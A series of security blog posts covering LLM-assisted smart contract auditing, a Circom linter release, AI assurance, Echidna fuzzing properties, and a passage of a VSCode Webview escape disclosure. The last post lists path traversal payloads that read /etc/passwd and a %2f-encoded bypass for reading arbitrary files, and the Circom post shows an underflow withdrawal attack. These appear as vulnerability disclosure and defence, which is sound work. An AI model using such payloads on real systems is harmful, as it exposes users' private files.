Codex (and GPT-4) can’t beat humans on smart contract audits

By Artem Dinaburg, Chief Technology Officer; Josselin Feist, Principal Engineer; and Riccardo Schirone, Security Engineer

Is artificial intelligence (AI) capable of powering software security audits? Over the last four months, we piloted a project called Toucan to find out. Toucan was intended to integrate OpenAI’s Codex into our Solidity auditing workflow. This experiment went far beyond writing “where is the bug?” in a prompt and expecting sound and complete results.

Our multi-functional team, consisting of auditors, developers, and machine learning (ML) experts, put serious work into prompt engineering and developed a custom prompting framework that worked around some frustrations and limitations of current large language model (LLM) tooling, such as working with incorrect and inconsistent results, handling rate limits, and creating complex, templated chains of prompts. At every step, we evaluated how effective Toucan was and whether it would make our auditors more productive or slow them down with false positives.

The technology is not yet ready for security audits for three main reasons:

  1. The models are not able to reason well about certain higher-level concepts, such as ownership of contracts, re-entrancy, and fee distribution.
  2. The software ecosystem around integrating large language models with traditional software is too crude and everything is cumbersome; there are virtually no developer-oriented tools, libraries, and type systems that work with uncertainty.
  3. There is a lack of development and debugging tools for prompt creation. To develop the libraries, language features, and tooling that will integrate core LLM technologies with traditional software, far more resources will be required.

Whoever successfully creates an LLM integration experience that developers love will create an incredible moat for their platform.

The above criticism still applies to GPT-4. Although it was released only a few days before the publication of this blog post, we quickly ran some of our experiments against GPT-4 (manually, via the ChatGPT interface). We conclude that GPT-4 presents an incremental improvement at analyzing Solidity code. While GPT-4 is considerably better than GPT-3.5 (ChatGPT) at analyzing Solidity, it is still missing key features, such as the ability to reason about cross-function reentrancy and inter-function relationships in general. There are also some capability regressions from Codex, like identification of variables, arithmetic expressions, and understanding of integer overflow. It is possible that with the proper prompting and context, GPT-4 could finally reason about these concepts. We look forward to experimenting more when API access to the large context GPT-4 model is released.

We are still excited at the prospect of what Codex and similar LLMs can provide: analysis capabilities that can be bootstrapped with relatively little effort. Although it does not match the fidelity of good algorithmic tools, for situations where no code analysis tools exist, something imperfect may be much better than having nothing.

Toucan was one of our first experiments with using LLMs for software security. We will continue to research AI-based tooling, integrating it into our workflow where appropriate, like auto-generating documentation for smart contracts under audit. AI-based capabilities are constantly improving, and we are eager to try newer, more capable technologies.

We want AI tools, too

Since we like to examine transformational and disruptive technologies, we evaluated OpenAI’s Codex for some internal analysis and transformation tasks and were very impressed with its abilities. For example, a recent intern integrated Codex within Ghidra to use it as a decompiler. This inspired us to see whether Codex could be applied to auditing Solidity smart contracts, given our expertise in tool development and smart contract assessments.

Auditing blockchain code is an acquired skill that takes time to develop (which is why we offer apprenticeships). A good auditor must synthesize multiple insights from different domains, including finance, languages, virtual machine internals, nuances about ABIs, commonly used libraries, and complex interactions with things like pricing oracles. They must also work within realistic time constraints, so efficiency is key.

We wanted Toucan to make human auditors better by increasing the amount of code they could investigate and the depth of the analysis they could accomplish. We were particularly excited because there was a chance that AI-based tools would be fundamentally better than traditional algorithmic-based tooling: it is possible to learn undecidable problems to an arbitrarily high accuracy, and program analysis bumps against undecidability all the time.

We initially wanted to see if Codex could analyze code for higher-level problems that could not be examined via static analysis. Unfortunately, Codex did not provide satisfactory results because it could not reason about higher-level concepts, even though it could explain and describe them in words.

We then pivoted to a different problem: could we use Codex to reduce the false positive rate from static analysis tools? After all, LLMs operate fundamentally different from our existing tools. Perhaps they provide enough signals to create new analyses previously untenable due to unacceptable false positives. Again, the answer was negative, as the number of failures was high even in average-sized code, and those failures were difficult to predict and characterize.

Below we’ll discuss what we actually built and how we went about assessing Toucan’s capabilities.

Was this worth our time?

Our assessment does not meet the rigors of scientific research and should not be taken as such. We attempted to be empirical and data-driven in our evaluation, but our goal was to decide whether Toucan warranted further development effort—not scientific publication.

At each point of Toucan development, we tried to assess whether we were on the right track. Before starting development, we manually used Codex to identify vulnerabilities that humans had found in specific open-source contracts—and with enough prompt engineering, Codex could.

After we had the capability to try small examples, we focused on three main concepts that seemed within Codex’s capability to understand: ownership, re-entrancy, and integer overflow. (A quick note for the astute reader: Solidity 0.8 fixed most integer overflow issues; developing overflow checks was an exercise in evaluating Codex’s capability against past code.) We could, fairly successfully, identify vulnerabilities regarding these concepts in small, purpose-made examples.

Finally, as we created enough tooling to automate asking questions against multiple larger contracts, we began to see the false positive and hallucination rates become too high.  Although we had some success with ever more complex prompts, it was still not enough to make Toucan viable.

Below are some key takeaways from our experience.

Codex does not fully grasp the higher-level concepts that we would like to ask about, and explaining them via complex prompt engineering does not always work or produce reliable results. We had originally intended to ask questions about higher-level concepts like ownership, re-entrancy, fee distribution, how pricing oracles are used, or even automated market makers (AMMs). Codex does not fully understand many of these abstract concepts, and asking about them failed in the initial evaluation stage. It somewhat comprehends the simplest concept — ownership — but even then it often cannot always correlate changes in the ‘owner’ variable with the concept of ownership. Codex does not appear to grasp re-entrancy attacks as a concept, even though it can describe them with natural language sentences.

It is very easy to delude yourself by p-hacking a prompt that works for one or a few examples. It is extremely difficult to get a prompt that generalizes very well across multiple, diverse inputs. For example, when testing whether Toucan could reason about ownership, we initially tried seven small (<50 LOC) examples from which we could determine a baseline. After a thorough prompt-engineering effort, Toucan could pass six out of seven tests, with the lone failing test requiring complex logic to induce ownership change. We then tried the same prompt on eight larger programs (> 300 LOC), among which Toucan identified 15 potential changes of ownership, with four false positives—including complete hallucinations. However, when we tried slight permutations of the original small tests, we could usually get the prompt to fail given relatively minor changes in input. Similarly, for integer overflow tests, we could get Toucan to successfully identify overflows in 10 out of 11 small examples, with one false positive—but a larger set of five contracts produced 12 positives — with six of them being false, including four instances of complete hallucinations or inability to follow directions.

Codex can be easily misled by small changes in syntax. Codex is not as precise as existing static analysis tools. It is easily confused by up comments, variable names, and small syntax changes. A particular thorn is reasoning about conditionals (e.g. ==, !=, <, >), where Codex will seemingly ignore them and create a conclusion based on function and variable names instead.

Codex excels at abstract tasks that are difficult to define algorithmically, especially if errors in the output are acceptable. For example, Codex will excel at queries like “Which functions in this contract manipulate global state?” without having to define “global state” or “manipulate.” The results might not be exact, but they will often be good enough to experiment with new analysis ideas. And while it is possible to define queries like this algorithmically, it is infinitely easier to ask in plain language.

The failure modes of Codex are not obvious to predict, but they are different from those of Slither and likely similar static analysis tools based on traditional algorithms.

A comparison of false and true positives found by Toucan and Slither
Figure 1: True positives (green) and false positives (red) found by Slither, Toucan, and both on some simple re-entrancy tests. The Toucan results are not encouraging.

We tried looking at the true/false positive sets of Slither and Toucan, and found that each tool had a different set of false positives/false negatives, with some overlap (Figure 1). Codex was not able to effectively reduce the false positive rate from a prototype Slither integer overflow detector. Overall, we noticed a tendency to reply affirmatively to our questions, increasing the number of positives discovered by Toucan.

Codex can perform basic static analysis tasks, but the rate of failure is too high to be useful and too difficult to characterize. This capability to perform successful analysis, even on short program fragments, is very impressive and should not be discounted! For languages that Codex understands but for which no suitable tooling exists, this capability could be extremely valuable—after all, some analysis could be much better than nothing. But the benchmark for Solidity is not nothing; we already have existing static analysis tooling that works very well.

How we framed our framework

During Toucan’s development, we created a custom prompting framework, a web-based front end, and rudimentary debugging and testing tools to evaluate prompts and to aid in unit and integration tests. The most important of these was the prompting framework.

Prompting framework

If we were making Toucan today, we’d probably just use LangChain. But at the time, LangChain did not have the features we needed. Frustratingly, neither OpenAI nor Microsoft offered an official, first-party prompting framework. This led us to develop a custom framework, with the goal that it should be possible for auditors to create new prompts without ever modifying Toucan’s code.

requires = [“emit-ownership-doc”, “emit-target-contract”,]
name = “Contract Ownership”
scope = “contract”
instantiation_condition = “any(‘admin’ in s.name.lower() or ‘owner’ in s.name.lower() for s in contract.state_variables)”

[[questions]]
name = “can-change”
query = “Is it possible to change the `{{ contract | owner_variable }}` variable by calling a function in the `{{ contract.name }}` contract without aborting the transaction? Think through it step by step, and answer as ‘Yes’, ‘No’, or ‘Unknown’. If ‘Yes’, please specify the function.”
is_decision = true

[[questions]]
name = “who-can-call”
runtime_condition = “questions[‘can-change’].is_affirmative()”
query = “””To reason about ownership:
1) First, carefully consider the code of the function
2) Second, reason step by step about the question.
Who can call the function successfully, that is, without aborting or revering the transaction?”””
answer_start = “””1) First, carefully consider the code of the function:”””

[[questions]]
name = “can-non-owner-call”
runtime_condition = “questions[‘can-change’].is_affirmative()”
query = “Can any sender who is not the current owner call the function without reverting or aborting?”
is_decision = true
finding_condition = “question.is_affirmative()”

Figure 2: Sample question chain asking about contract ownership. Before questions are emitted, the prompting framework also emits a specific explanation of what ownership means, with examples and information about the target contract.

Our framework supported chaining multiple questions together to support Chain of Thought and similar prompting techniques (Figure 2). Since GPT models like Codex are multi-shot learners, our framework also supported adding background information and examples before forming a prompt.

The framework also supported filtering on a per-question basis, as there may also be some questions relevant only to specific kinds of contracts (say, only ERC-20 tokens), and others questions may have a specific scope (e.g., a contract, function, or file scope). Finally, each question could be optionally routed to a different model.

The prompting framework also took great lengths to abide by OpenAI’s API limitations, including batching questions into one API invocation and keeping track of both the token count and API invocation rate limits. We hit these limits often and were very thankful the Codex model was free while in beta.

Test data

One of our development goals was that we would never compromise customer data by sending it to an OpenAI API endpoint. We had a strict policy of running Toucan only against open-source projects on GitHub (which would already have been indexed by Codex) with published reports, like those on our Publications page).

We were also able to use the rather extensive test set that comes with Slither, and our “building secure contracts” reference materials as additional test data. It is important to note that some of these tests and reference materials may have been a part of the Codex training set, which explains why we saw very good results on smaller test cases.

The missing tools

The lack of tooling from both OpenAI and Microsoft has been extremely disappointing, although that looks to be changing: Microsoft has a prompting library, and OpenAI recently released OpenAI Evals. The kinds of tools we’d have loved to see include a prompt debugger; a tree-graph visualization of tokens in prompts and responses with logprobs of each token; tools for testing prompts against massive data sets to evaluate quality; ways to ask the same question and combine results from counterexamples; and some plugins to common unit testing frameworks. Surely someone is thinking of the developers and making these tools?

Current programming languages lack the facilities for interfacing with neural architecture computers like LLMs or similar models. A core issue is the lack of capability to work with nondeterminism and uncertainty. When using LLMs, every answer has some built-in uncertainty: the outputs are inherently probabilistic, not discrete quantities. This uncertainty should be handled at the type system level so that one does not have to explicitly deal with probabilities until it is necessary. A pioneering project from Microsoft Research called Infer.NET does this for .NET-based languages, but there seem to be few concrete examples and no real tooling to combine this with LLMs.

Prompt engineering, and surrounding tooling, are still in their infancy. The biggest problem is that you never know when you are done: even now, it is always possible that we were just one or two prompts away from making Toucan a success. But at some point, you have to give up in the face of costs and schedules. With this in mind, the $300K salary for a fantastic prompt engineer does not seem absurd: if the only difference between a successful LLM deployment and a failure is a few prompts, the job quickly pays for itself. Fundamentally, though, this reflects a lack of tooling to assess prompt quality and evaluate responses.

There is no particularly good way to determine if one prompt is better than another or if you’re on the right track. Similarly, when a prompt fails against an input, it is frustratingly difficult to figure out why and to determine, programmatically, which prompts are merely returning the wrong result versus completely hallucinating and misbehaving.

Unit tests are also problematic; the results are not guaranteed to be the same across runs, and newer models may not provide the same results as prior ones. There is certainly a solution here, but again, the tooling developers expect just wasn’t present. OpenAI Evals is likely going to improve this situation.

Overall, the tooling ecosystem is lacking, and surprisingly, the biggest names in the field have not released anything substantial to improve the adoption and integration of LLMs into real software projects that people use. However, we are excited that the open source community is stepping up with really cool projects like LangChain and LlamaIndex.

Humans still reign supreme

OpenAI’s Codex is not yet ready to take over the job of software security auditors. It lacks the ability to reason about the proper concepts and produces too many false positives for practical usage in audit tasks. However, there is clearly a nascent capability to perform interesting analysis tasks, and underlying models should quickly get more capable. We are very excited to keep using the technology as it improves. For example, the new larger context window with GPT-4 may allow us to provide enough context and direction to handle complex tasks.

Even though Codex (and GPT-4) do not currently match mature algorithmic-based tools, LLM-based tools—even those of lower quality—may have interesting uses. For languages for which no analysis tooling exists, developers can bootstrap something from LLMs relatively quickly. The ability to provide some reasonable analysis where none previously existed may be considerably better than nothing at all.

We hope the ability to integrate language models into existing programs improves quickly, as there is currently a severe lack of languages, libraries, type systems, and other tooling for the integration of LLMs into traditional software. Disappointingly, the main organizations releasing LLMs have not released much tooling to enable their use. Thankfully, open-source projects are filling the gap. There is still enormous work to be done, and whoever can make a wonderful developer experience working with LLMs stands to capture developer mindshare.

LLM capability is rapidly improving, and if it continues, the next generation of LLMs may serve as capable assistants to security auditors. Before developing Toucan, we used Codex to take an internal blockchain assessment occasionally used in hiring. It didn’t pass—but if it were a candidate, we’d ask it to take some time to develop its skills and return in a few months. It did return—we had GPT-4 take the same assessment—and it still didn’t pass, although it did better. Perhaps the large context window version with proper prompting could pass our assessment. We’re very eager to find out!

Circomspect has more passes!

By Fredrik Dahlgren, Principal Security Engineer

TL;DR: We have released version 0.8.0 of Circomspect, our static analyzer and linter for Circom. Since our initial release of Circomspect in September 2022, we have added five new analysis passes, support for tags, tuples, and anonymous components, links to in-depth descriptions of each identified issue, and squashed a number of bugs. Please download the new version and tell us what you think!

New analysis passes

The new analysis passes, added to the tool’s initial nine, check for a range of issues that could occur in Circom code:

  1. Failure to properly constrain intermediate signals
  2. Failure to constrain output signals in instantiated templates
  3. Failure to constrain divisors in division operations to nonzero values
  4. Use of BN254-specific templates from Circomlib with a different curve
  5. Failure to properly constrain inputs to Circomlib’s LessThan circuit

Apart from finding the issue related to the Circomlib LessThan circuit discussed below, these analysis passes would also have caught the “million dollar ZK bug” recently identified by Veridise in the circom-pairing library.

To understand the types of issues that Circomspect can identify, let’s dig into the final example in this list. This analysis pass identifies an issue related to the LessThan circuit implemented by Circomlib, the de facto standard library for Circom. To fully understand the issue, we first need to take a step back and understand how signed values are represented by Circom.

Signed arithmetic in GF(p)

Circom programs operate on variables called signals, which represent elements in the finite field GF(p) of integers modulo a prime number p. It is common to identify the elements in GF(p) with the unsigned integers in the half-open interval [0, p). However, it is sometimes convenient to use field elements to represent signed quantities in the same way that we may use the elements in [0, 232) to represent signed 32-bit integers. Mirroring the definition for two’s complement used to represent signed integer values, we define val(x) as follows:

We then say that a is less than b in GF(p) if val(a) < val(b) as signed integers. This means that q = floor(p/2) is the greatest signed value representable in GF(p), and that -q = q + 1 is the least signed value representable in GF(p). It also means, perhaps somewhat surprisingly, that q + 1 is actually less than q. This is also how the comparison operator < is implemented by the Circom compiler.

As usual, we say that a is positive if a > 0 and negative if a < 0. One way to ensure that a value a is nonnegative is to restrict the size (in bits) of the binary representation of a. In particular, if the size of a is strictly less than log(p) - 1 bits, then a must be less than or equal to q and, therefore, nonnegative.

Circomlib’s ‘LessThan’ template

With this out of the way, let’s turn our attention to the LessThan template defined by Circomlib. This template can be used to constrain two input signals a and b to ensure that a < b, and is implemented as follows:

The LessThan template defined by Circomlib

Looking at the implementation, we see that it takes an input parameter n and two input signals in[0] and in[1], and it defines a single output signal out. Additionally, the template uses the Num2Bits template from Circomlib to constrain the output signal out.

The Num2Bits template from Circomlib takes a single parameter n and can be used to convert a field element to its n-bit binary representation, which is given by the array out of size n. Since the size of the binary representation is bounded by the parameter n, the input to Num2Bits is also implicitly constrained to n bits. In the implementation of LessThan above, the expression (1 << n) + in[0] - in[1] is passed as input to Num2Bits, which constrains the absolute value |in[0] - in[1]| to n bits.

To understand the subtleties of the implementation of the LessThan template, let’s first consider the expected use case when both inputs to LessThan are at most n bits, where n is small enough to ensure that both inputs are nonnegative.

We have two cases to consider. If in[0] < in[1], then in[0] - in[1] is a negative n-bit value, and (1 << n) + in[0] - in[1] is a positive n-bit value. It follows that bit n in the binary representation of the input to Num2Bits is 0, and thus out must be equal to 1 - 0 = 1.

On the other hand, if in[0] ≥ in[1], then in[0] - in[1] is a nonnegative n-bit value (since both inputs are positive), and (1 << n) + in[0] - in[1] is a positive (n + 1)-bit value with the most significant bit equal to 1, It follows that bit n in the binary representation of the input to Num2Bits is 1, and out must be given by 1 - 1 = 0.

This all makes sense and gives us some confidence if we want to use LessThan for range proofs in our own circuits. However, things become more complicated if we forget to constrain the size of the inputs passed to LessThan.

Using signals to represent unsigned quantities

To describe the first type of issue that may affect circuits defined using LessThan, consider the case in which signals are used to represent unsigned values like monetary amounts. Say that we want to allow users to withdraw funds from our system without revealing sensitive information, like the total balance belonging to a single user or the amounts withdrawn by users. We could use LessThan to implement the part of the circuit that validates the withdrawn amount against the total balance as follows:

The ValidateWithdrawal template should ensure that users cannot withdraw more than their total balance.

Now, suppose that a malicious user with a zero balance decides to withdraw p - 1 tokens from the system, where p is the size of the underlying prime field. Clearly, this should not be allowed since p - 1 is a ridiculously large number and, in any case, the user has no tokens available for withdrawal. However, looking at the implementation of LessThan, we see that in this case, the input to Num2Bits will be given by (1 << 64) + (p - 1) - (0 + 1) = (1 << 64) - 2 (as all arithmetic is done modulo p). It follows that bit 64 of the binary representation of the input will be 0, and the output from LessThan will be 1 - n2b.out[64] = 1 - 0 = 1. This also means that ValidateWithdrawal will identify the withdrawal as valid.

The problem here is that p - 1 also represents the signed quantity –1 in GF(p). Clearly, -1 is less than 1, and we have not constrained the withdrawn amount to be nonnegative. Adding a constraint restricting the size of the amount to be less than log(p) - 1 bits would ensure that the amount must be positive, which would prevent this issue.

More generally, since the input parameter n to LessThan restricts only the size of the difference |in[0] - in[1]|, we typically cannot use LessThan to prevent overflows and underflows. This is a subtle point that many developers miss. As an example, consider the section on arithmetic overflows and underflows from the zero-knowledge (ZK) bug tracker maintained by 0xPARC. In an earlier version, 0xPARC suggested using LessThan to constrain the relevant signals in an example that was almost identical to the vulnerable ValidateWithdrawal template defined above!

Another vulnerability of this type was found by Daira Hopwood in an early version of the ZK space-conquest game Dark Forest. Here, the vulnerability allowed users to colonize planets far outside the playing field. The developers addressed the issue by adding a range proof based on the Num2Bits template that restricted the size of the coordinates to 31 bits.

Using signals to represent signed quantities

Now, suppose signals are used to represent signed quantities. In particular, let’s consider what would happen if we passed q = floor(p/2) and q + 1 as inputs to LessThan. We will show that even though q + 1 < q according to the Circom compiler, q is actually less than q + 1 according to LessThan. Returning to the input to Num2Bits in the definition of LessThan, we see that if in[0] = q and in[1] = q + 1, the input to Num2Bits is given by the following expression:

(1 << n) + in[0] - in[1] = (1 << n) + q - (q + 1) = (1 << n) - 1

It follows that the nth bit in the binary representation of this value is 0, and the output from LessThan is 1 - n2b.out[n] = 1 - 0 = 1. Thus, q < q + 1 according to LessThan, even though q + 1 < q according to the compiler!

It is worth reiterating here that the input parameter n to LessThan does not restrict the size of the inputs, only the absolute value of their difference. Thus, we are free to pass very large (or very small) inputs to LessThan. Again, this issue can be prevented if the size of both of the inputs to the LessThan template are restricted to be less than log(p) - 1 bits.

Circomspect to the rescue (part 1)

To find issues of this type, Circomspect identifies locations where LessThan is used. It then tries to see whether the inputs to LessThan are constrained to less than log(p) - 1 bits using the Num2Bits template from Circomlib, and it emits a warning if it finds no such constraints. This allows the developer (or reviewer) to quickly identify locations in the codebase that require further review.

The output from the latest version of Circomspect running on the ValidateWithdrawal template defined above.

As shown in the screenshot above, each warning from Circomspect will now typically also contain a link to a description of the potential issue, and recommendations for how to resolve it.

Circomspect to the rescue (part 2)

We would also like to mention another of our new analysis passes. The latest version of Circomspect identifies locations where a template is instantiated but the output signals defined by the template are not constrained.

As an example, consider the ValidateWithdrawal template introduced above. Suppose that we rewrite the template to include range proofs for the input signals amount and total. However, during the rewrite we accidentally forget to include a constraint ensuring that the output from LessThan is 1. This means that users may be able to withdraw amounts that are greater than their total balance, which is obviously a serious vulnerability!

We rewrite ValidateWithdrawal to include range proofs for the two inputs amount and total, but accidentally forget to constrain the output signal lt.out to be 1!

There are examples (like Num2Bits) in which a template constrains its inputs and no further constraints on the outputs are required. However, forgetting to constrain the output from a template generally indicates a mistake and requires further review to determine whether it constitutes a vulnerability. Circomspect will flag locations where output signals are not constrained to ensure that each location can be manually checked for correctness.

Circomspect now generates a warning if it finds that the output signals defined by a template are not properly constrained.

Let’s talk!

We at Trail of Bits are excited about contributing to the growing range of tools and libraries for ZK that have emerged in the last few years. If you are building a project using ZK, we would love to talk to you to see if we can help in any way. If you are interested in having your code reviewed by us, or if you’re looking to outsource parts of the development to a trusted third party, please get in touch with our team of experienced cryptographers.

We need a new way to measure AI security

Tl;dr: Trail of Bits has launched a practice focused on machine learning and artificial intelligence, bringing together safety and security methodologies to create a new risk assessment and assurance program. This program evaluates potential bespoke risks and determines the necessary safety and security measures for AI-based systems.

If you’ve read any news over the past six months, you’re aware of the unbridled enthusiasm for artificial intelligence. The public has flocked to tools built on systems like GPT-3 and Stable Diffusion, captivated by how they alter our capacity to create and interact with each other. While these systems have amassed headlines, they constitute a small fraction of AI-based systems that are currently in use, powering technology that is influencing outcomes in all aspects of life, such as finance, healthcare, transportation and more. People are also attempting to shoehorn models like GPT-3 into their own applications, even though these models may introduce unintended risks or not be adequate for their desired results. Those risks will compound as the industry moves to multimodal models.

With people in many fields trying to hop on the AI bandwagon, we are dealing with security and safety issues that have plagued the waves of innovation that have swept through society in the last 50 years. This includes issues such as proper risk identification and quantification, responsible and coordinated vulnerability disclosures, and safe deployment strategies. In the rush to embrace AI, the public is at a loss as to the full scope of its impact, and whether these systems are truly safe. Furthermore, the work seeking to map, measure, and mitigate against newfound risks has fallen short, due to the limitations and nuances that come with applying traditional measures to AI-based systems.

The new ML/AI assurance practice at Trail of Bits aims to address these issues. With our forthcoming work, we not only want to ensure that AI systems have been accurately evaluated for potential risk and safety concerns, but we also want to establish a framework that auditors, developers and other stakeholders can use to better assess potential risks and required safety mitigations for AI-based systems. Further work will build evaluation benchmarks, particularly focused on cybersecurity, for future machine-learning models. We will approach the AI ecosystem with the same rigor that we are known to apply to other technological areas, and hope the services transform the way practitioners in this field work on a daily basis.

In a paper released by Heidy Khlaaf, our engineering director of ML/AI assurance, we propose a novel, end-to-end AI risk framework that incorporates the concept of an Operational Design Domain (ODD), which can better outline the hazards and harms a system can potentially have. ODDs are a concept that has been used in the autonomous vehicle space, but we want to take it further: By having a framework that can be applied to all AI-based systems, we can better assess potential risks and required safety mitigations, no matter the application.

We also discuss in the paper:

  • When “safety” doesn’t mean safety: The AI community has conflated “requirements engineering” with “safety measures,” which is not the same thing. In fact, it’s often contradictory!
  • The need for new measures: Risk assessment practices taken from other fields, i.e. hardware safety, don’t translate well to AI. There needs to be more done to uncover design issues that directly lead to systematic failures.
  • When “safety” doesn’t mean “security”: The two terms are not interchangeable, and need to be assessed differently when applied to AI and ML systems.
  • It hasn’t been all bad: The absence of well-defined operational boundaries for general AI and ML models has made it difficult to accurately assess the associated risks and safety, given the vast number of applications and potential hazards. We discuss what models can be adapted, specifically those that can ensure security and reliability.

The AI community, and the general public, will suffer the same or worse consequences we’ve seen in the past if we cannot safeguard the systems the world is rushing to adopt. In order to do so, it’s essential to get on the same page when it comes to terminology and techniques for safety objectives and risk assessments. However, we don’t need to reinvent the wheel. Applicable techniques already exist; they just need to be adapted to the AI and machine-learning space. With both this paper and our practice’s forthcoming work, we hope to bring clarity and cohesion to AI assurance and safety, in the hope that it can counter the marketing hype and exaggerated commercial messaging in the current marketplace that deemphasizes the security of this burgeoning technology.

This approach builds on our previous machine-learning work, and is just the beginning of our efforts in this domain. Any organizations interested in working with this team can contact Trail of Bits to inquire about future projects.

Reusable properties for Ethereum contracts

As smart contract security constantly evolves, property-based fuzzing has become a go-to technique for developers and security engineers. This technique relies on the creation of code properties – often called invariants – which describe what the code is supposed to do. To help the community define properties, we are releasing a set of 168 pre-built properties that can be used to guide Echidna, our smart contract fuzzing tool, or directly through unit tests. Properties covered include compliance with the most common ERC token interfaces, generically testable security properties, and properties for testing fixed point math operations.

Since mastering these tools takes time and practice, we will be holding two livestreams on our Twitch and YouTube channels that will provide hands-on experience with these invariants:

  • March 7 – ERC20 properties, example usage, and Echidna cheat codes (Guillermo Larregay)
  • March 14 – ERC4626 properties, example usage, and tips on fuzzing effectively (Benjamin Samuels)

Why should I use this?

The repository and related workshops will demonstrate how fuzzing can provide a much higher level of security assurance than unit tests alone. This collection of properties is simple to integrate with projects that use well-known standards or commonly-used libraries. This release contains tests for the ABDKMath64x64 library, ERC-20 token standard, and ERC-4626 tokenized vaults standard:

ERC20

  • Properties for standard interface functions
  • Inferred sanity properties (ex: no user balance should be greater than token supply)
  • Properties for extensions such as burnable, mintable, and pausable tokens.

ERC4626

  • Properties that verify rounding directions are compliant with spec
  • Reversion properties for functions that must never revert
  • Differential testing properties (ex: deposit() must match functionality predicted by previewDeposit())
  • Functionality properties (ex: redeem() deducts shares from the correct account)
  • Non-spec security properties (share inflation attack, token approval checks, etc.)

ABDKMath64x64

  • Communicative, associative, distributive, and identity properties for relevant functions
  • Differential testing properties (ex: 2^(-x) == 1/2^(x))
  • Reversion properties for functions which should revert for certain ranges of input
  • Negative reversion properties for functions that should not revert for certain ranges of input
  • Interval properties (ex: min(x,y) <= avg(x,y) <= max(x,y))

The goal of these properties is to detect vulnerabilities or deviations from expected results, ensure adherence to standards, and provide guidance to developers writing invariants. By following this workshop, developers will be able to identify complex security issues that cannot be detected with conventional unit and parameterized tests. Furthermore, using this repository will enable developers to focus on deeper systemic issues instead of wasting time on low-hanging fruit.

As a bonus, while creating and testing these properties, we found a bug in the ABDKMath64x64 library: for a specific range of inputs to the divuu function, an assertion could be triggered in the library. More information about the bug, from one of the library's authors, can be found here.

Do It Yourself!

If you don’t want to wait for the livestream, you can get started right now. Here’s how to add the properties to your own repo:

Let’s say you want to create a new ERC20 contract called YetAnotherCashEquivalentToken, and check that it is compliant with the standard. Following the previous steps, you create the following test contract for performing an external test:

pragma solidity ^0.8.0;
import "./path/to/YetAnotherCashEquivalentToken.sol";
import {ICryticTokenMock} from "@crytic/properties/contracts/ERC20/external/util/ITokenMock.sol";
import {CryticERC20ExternalBasicProperties} from "@crytic/properties/contracts/ERC20/external/properties/ERC20ExternalBasicProperties.sol";
import {PropertiesConstants} from "@crytic/properties/contracts/util/PropertiesConstants.sol";


contract CryticERC20ExternalHarness is CryticERC20ExternalBasicProperties {   
    constructor() {
        // Deploy ERC20
        token = ICryticTokenMock(address(new CryticTokenMock()));
    }
}

contract CryticTokenMock is YetAnotherCashEquivalentToken, PropertiesConstants {

    bool public isMintableOrBurnable;
    uint256 public initialSupply;
    constructor () {
        _mint(USER1, INITIAL_BALANCE);
        _mint(USER2, INITIAL_BALANCE);
        _mint(USER3, INITIAL_BALANCE);
        _mint(msg.sender, INITIAL_BALANCE);

        initialSupply = totalSupply();
        isMintableOrBurnable = false;
    }
}

Then, a configuration file is needed to set the fuzzing parameters to run in Echidna:

corpusDir: "tests/crytic/erc20/echidna-corpus-internal"
testMode: assertion
testLimit: 100000
deployer: "0x10000"
sender: ["0x10000", "0x20000", "0x30000"]
multi-abi: true

Finally, run Echidna on the test contract:

echidna-test . --contract CryticERC20ExternalHarness --config tests/echidna-external.yaml

Furthermore, this effort is fluid. Some ideas for future work include:

  • Test more of the widely-used mathematical libraries with our properties, such as PRBMath (properties/issues/2).
  • Add tests for more ERC standards (properties/issues/5).
  • Create a corpus of tests for other commonly used functions or contracts that are not standards, such as AMMs or liquidity pools (properties/issues/4).

Escaping well-configured VSCode extensions (for profit)

By Vasco Franco

In part one of this two-part series, we escaped Webviews in real-world misconfigured VSCode extensions. But can we still escape extensions if they are well-configured?

In this post, we’ll demonstrate how I bypassed a Webview’s localResourceRoots by exploiting small URL parsing differences between the browser—i.e., the Electron-created Chromium instance where VSCode and its Webviews run—and other VSCode logic and an over-reliance on the browser to do path normalization. This bypass allows an attacker with JavaScript execution inside a Webview to read files anywhere in the system, including those outside the localResourceRoots. Microsoft assigned this bug CVE-2022-41042 and awarded us a bounty of $7,500 (about $2,500 per minute of bug finding).

Finding the issue

While exploiting the vulnerabilities detailed in the last post, I wondered if there could be bugs in VSCode itself that would allow us to bypass any security feature that limits what a Webview can do. In particular, I was curious if we could still exploit the bug we found in the SARIF Viewer extension (vulnerability 1 in part 1) if there were stricter rules in the Webview’s localResourceRoots option.

From last post’s SARIF viewer exploit, we learned that you can always exfiltrate files using DNS prefetches if you have the following preconditions:

  • You can execute JavaScript in a Webview. This enables you to add link tags to the DOM.
  • The CSP’s connect-src directive has the .vscode-resource.vscode-cdn.net source. This enables you to fetch local files.

…Files within the localResourceRoots folders, that is! This option limits the folders from which a Webview can read files, and, in the SARIF viewer, it was configured to limit, well… nothing. But such a permissive localResourceRoots is rare. Most extensions only allow access to files in the current workspace and in the extensions folder (the default values for the localResourceRoots option).

Recall that Webviews read files by fetching the https://file+.vscode-resource.vscode-cdn.net “fake” domain, as shown in the example below.

Example of how to fetch a file from a VSCode extension Webview

Without even looking at how the code enforced the localResourceRoots option, I started playing around with different path traversal payloads with the goal of escaping from the root directories where we are imprisoned. I tried a few payloads, such as:

  • /etc/passwd
  • /../../../../../etc/passwd
  • /[valid_root]/../../../../../etc/passwd

As I expected, this didn’t work. The browser normalized the request’s path even before it reached VSCode, as shown in the image below.

Unsuccessful fetches of the /etc/passwd file

I started trying different variants that the browser would not normalize, but that some VSCode logic might consider a valid path. In about three minutes, to my surprise, I found out that using %2f.. instead of /.. allowed us to escape the root folder(!!!).

Successful fetch of the /etc/passwd file when using the / character URL encoded as %2f

We’ve escaped! We can now fetch files from anywhere in the filesystem. But why did this work? VSCode seems to decode the %2f, but I couldn’t really understand what was happening under the hood. My initial assumption was that the function that reads the file (e.g., the fs.readFile function) was decoding the %2f, while the path normalization function did not. As we’ll see, this was not a bad guess, but not quite the real cause.

Root cause analysis

Let’s start from the beginning and see how VSCode handles vscode-resource.vscode-cdn.net requests—remember, this is not a real domain.

It all starts in the service worker running on the Webview. This service worker intercepts every Webview’s request to the vscode-resource.vscode-cdn.net domain and transforms it into a postMessage('load-resource') to the main VSCode thread.

Code from the Webview’s service worker that intercepts fetch requests that start with vscode-resource.vscode-cdn.net and transforms them in a postMessage to the main VSCode thread (source)

VSCode will handle the postMessage('load-resource') call by building a URL object and calling loadResource, as shown below.

VSCode code that handles a load-resource postMessage. Highlighted in red is the code that decodes the fetched path—the first reason why our exploit works. (source)

